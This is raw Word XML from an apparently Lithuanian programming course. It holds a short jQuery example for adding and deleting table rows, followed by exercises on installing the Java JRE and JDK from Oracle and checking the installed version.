        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;script src="https://stackpath.bootstrapcdn.com/bootstrap/4.2.1/js/bootstrap.min.js" integrity="sha384-B0UglyR+jN6CkvvICOB2joaf5I4l3gm9GU6Hc1og6Ls7i6U/mkkaduKaBhlAXv9k"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        crossorigin="anonymous"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;script src="script.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002C1EB6" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00BB4951">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">script.js </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>$(".add-row").on("click", function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    var name = $("#name").val();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    var email = $("#email").val();</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 xml:space="preserve">    $("#name, #email").val("");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    var markup = "&lt;tr&gt;&lt;td&gt;&lt;input type='checkbox' name='record'&gt;&lt;/td&gt;&lt;td&gt;" + name + "&lt;/td&gt;&lt;td&gt;" + email + "&lt;/td&gt;&lt;/tr&gt;";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $("table tbody").append(markup);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>$(".delete-row").on("click", function (){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    $("table tbody").find('input[name="record"]').each(function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        if ($(this).is(":checked")) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">            $(this).parents("tr").remove();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    });</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00932685" w:rsidRDefault="00932685" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00964832" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="_Toc13833450"/>
      <w:bookmarkStart w:id="299" w:name="_Toc14392511"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:bookmarkStart w:id="300" w:name="_Toc2090184747"/>
      <w:bookmarkStart w:id="301" w:name="_Toc10444008"/>
      <w:bookmarkStart w:id="302" w:name="_Toc13095556"/>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Kompetencija. Kurti tipinę programinę įrangą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="300"/>
      <w:bookmarkEnd w:id="301"/>
      <w:bookmarkEnd w:id="302"/>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:right="282"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:iCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="001F4DEA" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="303" w:name="_Toc618265184"/>
      <w:bookmarkStart w:id="304" w:name="_Toc10444009"/>
      <w:bookmarkStart w:id="305" w:name="_Toc13095557"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>2.1.</w:t>
      </w:r>
      <w:r w:rsidR="007F15E2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="306" w:name="_Toc13833451"/>
      <w:bookmarkStart w:id="307" w:name="_Toc14392512"/>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. Naudoti </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pasirinktos</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> programavimo kalbos įrankius ir sintaksę</w:t>
      </w:r>
      <w:bookmarkEnd w:id="303"/>
      <w:bookmarkEnd w:id="304"/>
      <w:bookmarkEnd w:id="305"/>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="306"/>
      <w:bookmarkEnd w:id="307"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. WINDOWS, MAC ARBA LINUX OPERACINĖJE SISTEMOJE ĮSIDIEKITE JRE (JAVA RUNTIME ENVIRONMENT</w:t>
      </w:r>
      <w:r w:rsidR="00477961">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JRE diegimo paketą siunčiames iš:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00477961" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java SE Downloads</w:t>
      </w:r>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:history="1">
        <w:r w:rsidR="00A858DD" w:rsidRPr="00477961">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.oracle.com/technetwork/java/javase/downloads/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00A858DD" w:rsidRPr="00477961">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Diegimo ir konfigūravimo instrukcijos įvairioms JRE platformoms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java Platform, Standard Edition Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r w:rsidRPr="00477961">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/en/java/javase.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00477961">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Patikriname komandų eilutėje JRE versiją: java -version </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD"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WINDOWS, MAC ARBA LINUX OPERACINĖJE SISTEMOJE ĮSIDIEK</w:t>
      </w:r>
      <w:r w:rsidR="00B07098" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ITE JDK (JAVA  DEVELOPMENT KIT)</w:t>
      </w:r>
      <w:r w:rsidR="00195CD5">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="907" w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>JDK diegimo paketą siunčiames iš:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00784115">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java SE Downloads</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId120" w:history="1">
        <w:r w:rsidRPr="00784115">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://www.oracle.com/technetwork/java/javase/downloads/index.html.</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00784115">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Diegimo ir konfigūravimo instrukcijos įvairioms JDK platformoms:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Oracle (2019). </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:i/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Java Platform, Standard Edition Documentation</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. [žiūrėta 2019-05-27]. Prieiga per internetą </w:t>
      </w:r>
      <w:hyperlink r:id="rId121" w:history="1">
        <w:r w:rsidRPr="00195CD5">
          <w:rPr>
            <w:color w:val="006400"/>
            <w:u w:val="single"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://docs.oracle.com/en/java/javase.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A858DD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
